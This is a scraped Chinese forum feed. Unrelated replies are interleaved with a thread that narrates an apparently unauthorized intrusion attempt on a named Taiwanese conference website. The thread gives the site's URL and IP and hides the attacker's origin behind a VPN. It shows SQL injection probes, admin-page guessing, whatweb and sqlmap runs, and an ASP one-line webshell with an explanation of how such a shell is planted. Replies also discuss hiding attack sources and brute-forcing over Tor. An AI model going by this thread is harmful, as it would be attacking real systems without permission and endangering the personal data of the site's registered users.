潜伏发表回复 11年0个月前
水水水,真水,精华不会翻吗,伸手可耻啊
潜伏发表回复 11年0个月前
水水水,真水,精华不会翻吗,伸手可耻啊
吴景春发表回复 11年0个月前
引用 甘露醇六硝酸酯:液氧很便宜,甲烷或煤油也很便宜,比冲还很大,用这个做燃料吧 液氧在哪里买?
吴景春发表回复 11年0个月前
引用 fqy90:需要哪些材料呢 国外好像用的是氮气加压,你最好别尝试太危险
潜伏发表回复 11年0个月前
你这线太细,轨道的固定也有问题
1235642发表回复 11年0个月前
实话说,液机是很贵的。。。。
2211wk发表回复 11年0个月前
这个没个几万下不来的 高浓度过氧化氢很危险,lz要小心
2211wk发表回复 11年0个月前
弱弱地问一句:学校门口买的那种陶艺泥+陶瓷管可以吗
0000000发表回复 11年0个月前
楼主焊的好漂亮啊
happy·geek发表回复 11年0个月前
是超声波使水分子振动,然后加热了吗?
happy·geek发表回复 11年0个月前
引用 落叶兄:老板,要一杯奶茶不要奶茶,然后就得到了这个杯具。。。笑死了 然后被老板打了一顿
熊猫阿Bo发表回复 11年0个月前
引用 smith:vpn这里还好,再加上我只拿国外网站测试,没有什么问题。其实像tor这一类的我也考虑过,但无奈速度太慢,根本无法用来做爆破或机器注入,只好放弃 把tor当成整体看待的话,tor不还是单跳?
潜伏发表回复 11年0个月前
散热的话,三极管放在水里,完美解决散热[s::lol]
zhanglei发表回复 11年0个月前
皮太厚
zhanglei发表回复 11年0个月前
那个黄绿色的晶体,买点回来磨成粉,开水服下,有病治病,无病强身。[s::lol]
smith发表回复 11年0个月前
引用 熊猫阿Bo:挂上VPN有一个误区,那就是在快速全网扫描平民化的今天,跳板的单跳将被快速、有效、简单地识别出来,在网络攻击的源头追查上,单跳的VPN存在这样的问题:1.VPN提供者的可信性问题。2.额……我已经说了,单跳和没跳的差别越来越小。3.所有流量... vpn这里还好,再加上我只拿国外网站测试,没有什么问题。其实像tor这一类的我也考虑过,但无奈速度太慢,根本无法用来做爆破或机器注入,...
laji3865689发表回复 11年0个月前
控制器+单轴驱动板?为啥不用一体板呢,便宜。
smith发表回复 11年0个月前
最后查了一下,这个The Asian Conference on Engineering and Natural Sciences是在日本福冈举办的会议,这类会议属于付费投稿式的会议,也就是参会的教授要交钱(学校出),会议上教授可以对自己的研究进行公开交流提高自己在学术界的影响。
熊猫阿Bo发表回复 11年0个月前
挂上VPN有一个误区,那就是在快速全网扫描平民化的今天,跳板的单跳将被快速、有效、简单地识别出来,在网络攻击的源头追查上,单跳的VPN存在这样的问题:1.VPN提供者的可信性问题。2.额……我已经说了,单跳和没跳的差别越来越小。3.所有流量从一个点出去,万一这个点连不上,必要的后续步骤没完成,会留下明显的痕迹等各种后患。在这个bot横行的时代,使用单跳VPN作为跳板,实在是……
caobiao8888发表回复 11年0个月前
好吧,我正在调试这个,非常感谢,等我调试完了,我再加上我的参数,方便后来者,,我的是3Mhz的,
smith发表回复 11年0个月前
这里看来,网站的安全确实很有必要。那些报名参加这个会议的教授们如果填写了自己的真实信息,如电话号码、地址、年龄、专业。。。。这些信息的话,被拿别人拿到是很容易的事情。而在美国个人信息泄露网站是要背负责任的,而中国的话不管是大陆还是台湾,似乎都没有什么管的。
smith发表回复 11年0个月前
尝试了多种方法暴露网站的绝对路径,这样我也可以像上一个黑阔那样拿到shell,但试了一下没有用,没有绝对路径我就没法写shell渐渐地,我对这个网站失去兴趣,主要是这个网站是win系统的,而我的目的是能找到一台linux系统的机器来做代理,继续弄下去也没有太多的意义。
smith发表回复 11年0个月前
看了一下,这个网站也不算什么野鸡网站,还有注册页面,估计应该也有学者在里面注册填上自己的信息,如果真的填上真实信息的话,后果可怕[s::lol] 网页还有一些相关的知名大学和教授的名字,日本的东大也有好几个叫兽。 International Committee Kyung-Suk Cho, Ewha Womans University Shigeo Honma, Tokay Universi...
xianghu1122发表回复 11年0个月前
下来学学,艺多不压身
smith发表回复 11年0个月前
我猜想之前的黑阔也是用这种方法注入进来的,然后把<%execute(request("admin"))%>写到数据库里面,再把这段代码导出到网站目录下形成一个木马。 接着利用工具连接上去,就拿到了这个网站的webshell。不过这个黑阔也太懒了,做过手脚也不清除一下,然而相比之下,这个网站的管理员更懒,网站被入侵了也没有发现
smith发表回复 11年0个月前
第一个证明这个网站是IIS6.0 + access的,好老,挂不得会被发现有漏洞,第二个找到一个表表名是banner,这个确实是不常见的表名。也不太清楚这个表的作用是干嘛。第三个<%execute(request("admin"))%>明显就是一句话木马,证明这个网站已经有人入侵过了,估计已经拿了shell,而且还很长一段时间了。看来这个网站已经被别人入侵过了,很失望。
smith发表回复 11年0个月前
在这之前试了一下手动猜解表,admin和administrator、acens都试过了,没有一个猜出来,感觉其他人写得文章里面的步骤两下就猜出表来了有点不可思议,果然还是要靠工具吗?于是用sqlmap试了一下 上了sqlmap就开始哗啦啦地跑,此处略去大量打印,总之跑完之后猜出了以下的东西 python sqlmap.py -u http://acens-conf.org/index.asp?i...
smith发表回复 11年0个月前
再试了一下 http://acens-conf.org/robot.txt http://acens-conf.org/admin.asp http://acens-conf.org/admin/admin.asp http://acens-conf.org/administrator.asp ...... 都没找到页面,没办法,下一步只好交给工具了
smith发表回复 11年0个月前
用whatweb看了一下: http://acens-conf.org/index.asp [200] ASP_NET, Cookies[ASPSESSIONIDSSCARARB], Country[TAIWAN; REPUBLIC OF CHINA (ROC)][TW], HTTPServer[Microsoft-IIS/6.0], IP[220.133.246.2], Microsoft-II...
王WZJ_97发表回复 11年0个月前
小风扇经常湿着,硅钢片容易生锈卡住吧
smith发表回复 11年0个月前
再试了一下 http://acens-conf.org/index.asp?id=2 and 1=2 没有任何显示,前后的内容不一样,证明有sql注入点存在
smith发表回复 11年0个月前
先挂上VPN,这样我的IP就变成了某个小岛了,然后试一下 http://acens-conf.org/index.asp?id=2 and 1=1 正常
smith发表文章 11年0个月前
一次对台湾某网站的渗透测试
先说一下结果,没有成功,所以直接把网站地址发出来了。新手上路大牛莫喷,再加上这个站的价值也不大,没有什么信息。 网站地址这个: http://acens-conf.org/index.asp?id=2 这个网站是在百度锁定关键词org和asp找到的,这一类的站点漏洞比较多 页面还挺漂亮,和鬼子有联系?,The Asian Conference on Engineering and Natural ...